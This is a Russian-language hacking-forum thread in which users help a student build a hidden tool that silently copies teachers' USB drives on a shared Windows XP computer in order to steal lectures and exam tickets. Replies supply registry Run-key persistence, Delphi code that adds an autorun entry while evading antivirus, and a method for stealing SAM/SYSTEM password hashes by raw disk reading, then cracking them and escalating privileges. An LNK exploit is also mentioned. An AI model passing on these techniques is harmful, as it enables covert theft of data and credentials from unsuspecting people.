|
Скрытое копирование флешки
| |
| antbert | Дата: Понедельник, 05.11.2012, 21:29 | Сообщение # 1 |
Участник
Зарегистрирован: 19.09.2012
Группа: Пользователи
Сообщений: 60
Статус: Offline
| win xp. Учетка - Юзер.
Вставляется флешка. Нужно с нее скопировать всю информацию в директорию, которую я задам.
Процесс копирования должен идти скрытно)
Что подскажете?
|
| |
| |
| antbert | Дата: Понедельник, 05.11.2012, 22:28 | Сообщение # 2 |
|
Участник
Зарегистрирован: 19.09.2012
Группа: Пользователи
Сообщений: 60
Статус: Offline
| Собственно все решено, кроме добавление в загрузку из-под юзера windows xp. Никогда этим не занимался 
|
| |
| |
| xXxSh@dowxXx | Дата: Вторник, 06.11.2012, 10:56 | Сообщение # 3 |
Авторитетный
Зарегистрирован: 22.01.2012
Группа: Модераторы
Сообщений: 702
Статус: Offline
| Quote (antbert) добавление в загрузку из-под юзера windows xp
врят ли получится скрытно это сделать, нужны более высокие права.
Сообщение отредактировал xXxSh@dowxXx - Вторник, 06.11.2012, 11:24 |
| |
| |
| antbert | Дата: Вторник, 06.11.2012, 15:16 | Сообщение # 4 |
|
Участник
Зарегистрирован: 19.09.2012
Группа: Пользователи
Сообщений: 60
Статус: Offline
| Хм, а создать ярлык и переместить его в папку автозагрузки не вариант?
Фар на п.к запускается из авторана, следовательно и доступ туда есть.
|
| |
| |
| Don_Diego | Дата: Вторник, 06.11.2012, 16:32 | Сообщение # 5 |
Продвинутый
Зарегистрирован: 16.04.2012
Группа: Пользователи
Сообщений: 253
Статус: Offline
| Quote (antbert) Хм, а создать ярлык и переместить его в папку автозагрузки не вариант?
Ну попробуй... Если антивируса нету - еще проскочит такой вариант ))
А вообще я к примеру пишу в:
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
По крайней мере все кроме касперского молчит.
|
| |
| |
| dolphin | Дата: Вторник, 06.11.2012, 18:35 | Сообщение # 6 |
Администратор
Сообщений: 906
Статус: Offline
| Quote (antbert) win xp. Учетка - Юзер. Вставляется флешка. Нужно с нее скопировать всю информацию в директорию, которую я задам. Процесс копирования должен идти скрытно) Что подскажете?
Как я понял комп твой ну или к которому есть доступ напрямую, без "свидетелей", приходит друг вставляет флешку и всё с неё копируется тебе на комп, я правильно понял?
Просто сам недавно делал подобную программу с чуть более широким функционалом, могу подсказать как её сделать и поделится кодами.
|
| |
| |
| antbert | Дата: Вторник, 06.11.2012, 19:58 | Сообщение # 7 |
|
Участник
Зарегистрирован: 19.09.2012
Группа: Пользователи
Сообщений: 60
Статус: Offline
| Quote (dolphin) Как я понял комп твой ну или к которому есть доступ напрямую, без "свидетелей", приходит друг вставляет флешку и всё с неё копируется тебе на комп, я правильно понял?
Просто сам недавно делал подобную программу с чуть более широким функционалом, могу подсказать как её сделать и поделится кодами.
Да, есть п.к, куда люди вставляют периодически флешки. user mod.
Мне необходимо каждую из них скопировать. Суть в том, что постоянного доступа к п.к у меня нет.
После размышлений я пришел к выводу, что оптимальный вариант такой - я вставляю свою флешку с определенным именем. Запускаю софтинку, которая делает ее скрытой для системы/меняет ее на значок харда/не дает доступ. учетки. После того, как вставляется иные флешки - файлы копируются на нее. Далее выдергиваю и ухожу.
Собственно это оптимальный вариант, по крайней мере для моего случая, подойдет иной, был бы рад, если бы поделились.
Сообщение отредактировал antbert - Вторник, 06.11.2012, 20:16 |
| |
| |
| link993 | Дата: Вторник, 06.11.2012, 21:06 | Сообщение # 8 |
Участник
Зарегистрирован: 13.02.2011
Группа: Пользователи
Сообщений: 93
Статус: Offline
| Вот собственно код на добавление в автозагрузку. Антивирусы пока не палят.
Code procedure BatAutorun;
var
f:TextFile;
begin
AssignFile(f,'start.bat');
ReWrite(f);
WriteLn(f, 'reg add "hklm\software\microsoft\windows\currentversion\run" /v "root" /t reg_sz /d %WINDIR%\программа.exe /f ');
CloseFile(f);
end;
procedure start;
begin
WinExec('start.bat',WS_MAXIMIZE);
end;
begin
BatAutorun;
start;
end.
Только потом этот батник удалить нужно! Я думаю сам разберешься:3
|
| |
| |
| antbert | Дата: Вторник, 06.11.2012, 21:42 | Сообщение # 9 |
|
Участник
Зарегистрирован: 19.09.2012
Группа: Пользователи
Сообщений: 60
Статус: Offline
| Из-под юзера проверялся?
|
| |
| |
| C@T | Дата: Среда, 07.11.2012, 01:27 | Сообщение # 10 |
Авторитетный
Зарегистрирован: 06.03.2010
Группа: Модераторы
Сообщений: 265
Статус: Offline
| моя идея конечно может показатся слишком хардкорной, но, если же этот комп один, или же их несколько но они обслуживаются в одном офисе(мне просто почему то кажется что ты хочешь заразить то место где люди ходят печатать какие то документы(у нас в универе такая аудитория есть, куда чутли не весь универ печатать рефераты, лабы и прочее ходит, сам когда то его заразить хотел, переписал для этого даже LNK експлоит, что бы он не палился(кстати, этот сплоит в добавок повышает привелегии)))
суть в чем, скопировать с того компа файла SAM и SYSTEM (хранятся C:\Windows\System32\config\RegBack) , в них хранятся хеши паролей юзеров, скопировать простым обрахом не получится, но можно скопировать эти файлы с винчестера, насколько я помню то открыть файл винчестера для чтения можно без прав администратора(даже под вин7), открыв файл винчестера на прямую и прочитав кластеры этого файла прямо с винчестера, можно сохранить этот файл на флешку, дальше взбрутить хеш пароля у себя на компе(программка SAMInside хорошо справляется) , дальше когда заведомо извесны логин и пароль администратора можно запустить свой процесс от администратора через API-шку CreateProcessAsUser (насколько я помню как она называется)
P.S ну или заюзать сплоит, под ХР сайчас много что работает, например тот же LNK, у меня с ним получалось шаманить так что не один русский антивирь его не палил
|
| |
| |
| antbert | Дата: Среда, 07.11.2012, 01:35 | Сообщение # 11 |
|
Участник
Зарегистрирован: 19.09.2012
Группа: Пользователи
Сообщений: 60
Статус: Offline
| Quote (C@T) моя идея конечно может показатся слишком хардкорной, но, если же этот комп один, или же их несколько но они обслуживаются в одном офисе(мне просто почему то кажется что ты хочешь заразить то место где люди ходят печатать какие то документы(у нас в универе такая аудитория есть, куда чутли не весь универ печатать рефераты, лабы и прочее ходит, сам когда то его заразить хотел, переписал для этого даже LNK експлоит, что бы он не палился(кстати, этот сплоит в добавок повышает привелегии)))
суть в чем, скопировать с того компа файла SAM и SYSTEM (хранятся C:\Windows\System32\config\RegBack) , в них хранятся хеши паролей юзеров, скопировать простым обрахом не получится, но можно скопировать эти файлы с винчестера, насколько я помню то открыть файл винчестера для чтения можно без прав администратора(даже под вин7), открыв файл винчестера на прямую и прочитав кластеры этого файла прямо с винчестера, можно сохранить этот файл на флешку, дальше взбрутить хеш пароля у себя на компе(программка SAMInside хорошо справляется) , дальше когда заведомо извесны логин и пароль администратора можно запустить свой процесс от администратора через API-шку CreateProcessAsUser (насколько я помню как она называется)
P.S ну или заюзать сплоит, под ХР сайчас много что работает, например тот же LNK, у меня с ним получалось шаманить так что не один русский антивирь его не палил
Практически так. У преподавателей на флешках есть все лекции в электронном виде, которые они не дают.
Так-же есть шанс того, что там будут билеты и прочая чушь. В общем попробовать как минимум стоит.
Хеши советую брутить либо по таблицам, либо ботнетом, либо по видюхе. В общем это не вопрос.
Сообщение отредактировал antbert - Среда, 07.11.2012, 01:35 |
| |
| |
| xXxSh@dowxXx | Дата: Четверг, 08.11.2012, 11:07 | Сообщение # 12 |
|
Авторитетный
Зарегистрирован: 22.01.2012
Группа: Модераторы
Сообщений: 702
Статус: Offline
| C@T отличная идея!
Quote (antbert) У преподавателей на флешках есть все лекции в электронном виде, которые они не дают. smile
Так-же есть шанс того, что там будут билеты и прочая чушь
и тебе antbert спс, как то я даже об этом и не задумывался, хотя когда я учился у меня и так был доступ к компам в учительской 
|
| |
| |
| antbert | Дата: Воскресенье, 11.11.2012, 13:57 | Сообщение # 13 |
|
Участник
Зарегистрирован: 19.09.2012
Группа: Пользователи
Сообщений: 60
Статус: Offline
| Два человека описали свой код, но не показали. Странно)
|
| |
| |
| antbert | Дата: Понедельник, 12.11.2012, 23:27 | Сообщение # 14 |
|
Участник
Зарегистрирован: 19.09.2012
Группа: Пользователи
Сообщений: 60
Статус: Offline
| Хм, видимо попросить нужно.
Не могли бы вы показать результаты своей работы.
|
| |
| |
| Marra_Kesh | Дата: Четверг, 15.11.2012, 17:45 | Сообщение # 15 |
Постоянный
Зарегистрирован: 19.12.2009
Группа: Модераторы
Сообщений: 182
Статус: Offline
|
antbert, http://code.progler.ru/get/697 Если конечно Я тебя правильно понял...
|
| |
| |
| antbert | Дата: Четверг, 15.11.2012, 19:17 | Сообщение # 16 |
|
Участник
Зарегистрирован: 19.09.2012
Группа: Пользователи
Сообщений: 60
Статус: Offline
| Да, это, правда "не тестировалась", ну это не трудно.
|
| |
| |
|
